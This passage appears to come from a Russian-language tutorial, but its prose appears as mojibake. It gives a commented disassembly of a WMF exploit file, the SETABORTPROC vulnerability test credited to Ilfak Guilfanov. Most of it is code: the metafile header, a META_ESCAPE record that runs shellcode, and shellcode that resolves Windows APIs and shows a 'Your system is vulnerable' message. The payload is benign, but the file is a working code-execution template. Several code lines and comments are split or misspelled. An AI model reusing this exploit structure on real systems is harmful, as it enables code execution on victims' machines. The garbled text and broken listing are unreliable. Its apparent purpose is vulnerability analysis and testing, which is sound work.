ñòðóêòóðà ôðåéìîâûõ çàïèñåé
Ïîñëåäíÿÿ çàïèñü âñåãäà èìååò âèä 0003h 0000h 0000h (ðàçìåð çàãîëîâêà — 03h ñëîâà, ôóíêöèÿ – NULL, ïàðàìåòðîâ — íåò), ÷òî èíòåðïðåòèðóåòñÿ êàê "êîíåö ìåòàôàéëà".
Òåïåðü ïîêóðèì è íà÷íåì äèçàññåìáëèðîâàòü exploit.wmf, â êîòîðîì î÷åíü ìíîãî áàéò, íî âñå ñîâñåì ïðîñòûå. Êîðî÷å, îòêîììåíòèðîâàííûé ëèñòèíã êîòîðîãî ïðèâåäåíîäèòñÿ íèæå:
WindowsMetaHeader: ; # ñòàíäàðòíûé çàãîëîâîê ìåòàôàéëà
FileType dw 1 ; òèï ôàéëà (0 - ïàìÿòü, 1 - äèñê)
; API-ôóíêöèÿ PlayMetaFile èãíîðèðóåò ýòî çíà÷åíèå,
; íî áîëüøèíñòâî ïðîñìîòðùèêîâ òèïà Irfan Viewer'à òðåáóþò FileType == 1
;
HeaderSize dw 9 ; ðàçìåð çàãîëîâêà â ñëîâàõ (âñåãäà 09h)
Version dw 300h ; òðåáóåìàÿ âåðñèÿ Windows (01h | 03h)
FileSize dd 0EDh ; ðàçìåð ôàéëà â ñëîâàõ
; èãíîðóååòñÿ PlayMeatFile, IrfanViewer òðåáóåò ïðàâèëüíîãî çíà÷åíèÿ
;
NumOfObjects dw 6 ; êîë-âî îáúåêòîâ (ìîæåò áûòü ëþáûì)
MaxRecordSize dd 3Dh ; ðàçìåð ñàìîé áîëüøîé çàïèñè (ìîæåò áûòü ëþáûì)
NumOfParams dw 0 ; êîë-âî ïàðàìåòðîâ (ìîæåò áûòü ëþáûì)
StandardMetaRecord: ; # ôðåéìîâàÿ çàïèñü META_ESCAPE ñ shell-êîäîì
Size dd 11h ; ðàçìåð çàïèñè â ñëîâàõ âìåñòå ñ SMR ( >
00h)
Function db 26h ; íîìåð ôóíêöèè - META_Escape (ñì. WINGDI.H)
num_of_arg db 6 ; êîë-âî àðãóìåíòîâ (ìîæåò áûòü ëþáûì)
subfunct dw 9 ; ïîäôóíêöèÿ - SETABORTPROC
(ñì. WINDGI.H)
hDC dw 16h ; ïàðàìåòð SETABORTPROC - hDC (èãíîðèðóåòñÿ)
shell_code proc near
call $+5 ; \_ EBP := EIP îïðåäåëÿåì òåêóùèé EIP
pop ebp ; / EBP := EIP
call GetKrnl32addr ; îïðåäåëÿì áàçîâûé àäðåñbase of KERNEL32.DLL
mov ebx, eax ; ebx := eax := base ofáàçîâûé àäðåñ
KERNEL32.DLL
; ïðîâåðêà ôëàãà f_silent_mode
; if (f_silet_mode == 0) MessageBox();
esle Exit();
mov ecx, (offset f_silent_mode-21h)
add ecx, ebp
mov ecx, [ecx]
test ecx, ecx
jnz short exit ; -->
f_silent_mode !=0, goto Exit()
; îïðåäåëÿåì àäðåñ API-ôóíêöèè LoadLibraryA
mov ecx, (offset aLoadlibrarya-21h) ; "LoadLibraryA"
add ecx, ebp ; ^ "LoadLibraryA"
push ecx ; ->
mov ecx,&"LoadLibraryA"
push ebx ; mov ebx, base of KERNEL32.DLL
call GetProcAddr ; mov eax, <= &LoadLibraryA"())
; çàãðóæàåì áèáëèîòåêó USER32.DLL
mov ecx, (offset aUser32_dll-21h) ; "user32.dll"
add ecx, ebp ; ^ "user32.dll"
push ecx ; ->
&"user32.dll"
call eax ; call LoadLibraryA("user32.dll")
; îïðåäåëÿåì àäðåñ API-ôóíêöèè MessageBoxA
mov ecx, (offset aMessageboxa-21h) ; "MessageBoxA"
add ecx, ebp ; ^ "MessageBoxA"
push ecx ; ->
&"MessageBoxA"
push eax ; base of USER32.DLL
call GetProcAddr ; eax <= &MessageBoxA()
; âûçûâàåì MessageBoxA, âûâîäèì ïðèâåòñòâèå íà ýêðàí
push 0 ; uType
push 0 ; lpCaption
mov ecx, (offset aYourSystemIsVu-21h) ; "Your system is vulnerable"
add ecx, ebp ; ^ "Your system is vulnerable"
push ecx ; lpText
push 0 ; hWnd
call eax ; call MessageBox
exit: ; òåðìèðóåì òåêóùèé ïðîöåññ-õîçÿèí ; CODE XREF: shell_code+18j
mov ecx, (offset aExitprocess-21h) ; "ExitProcess"
add ecx, ebp ; ^ "ExitProcess"
push ecx ; ->
"ExitProcess"
push ebx ; base of KERNEL32.DLL
call GetProcAddr ; eax <= &ExitProcess()
push 1 ; uExitCode
call eax ; call ExitProcess(1);
shell_code endp
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: shell_code+32o
aExitprocess db 'ExitProcess',0 ; DATA XREF: shell_code:exito
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: shell_code+1Ao
aUser32_dll db 'user32.dll',0 ; DATA XREF: shell_code+28o
aYourSystemIsVu db 'Your system is vulnerable',Ah; DATA XREF: shell_code+44o
db 'Please visit http://www.hexblog.com and install the hotfix!',0
aWmfVulnerabili db ' WMF Vulnerability test file by Ilfak Guilfanov',0
f_silent_mode dd 0 ; DATA XREF: shell_code+Do
; çàìûêàþùàÿ ôðåéìîâàÿ çàïèñü
; (òðåáóåòñÿ ïî ñïåöèôèêàöèè, íî íà ïðàêòèêå íåîáÿçàòåëüíà)
EndingMetaRecord:
Size dw 3
Function dw 0
Parameters dw 0
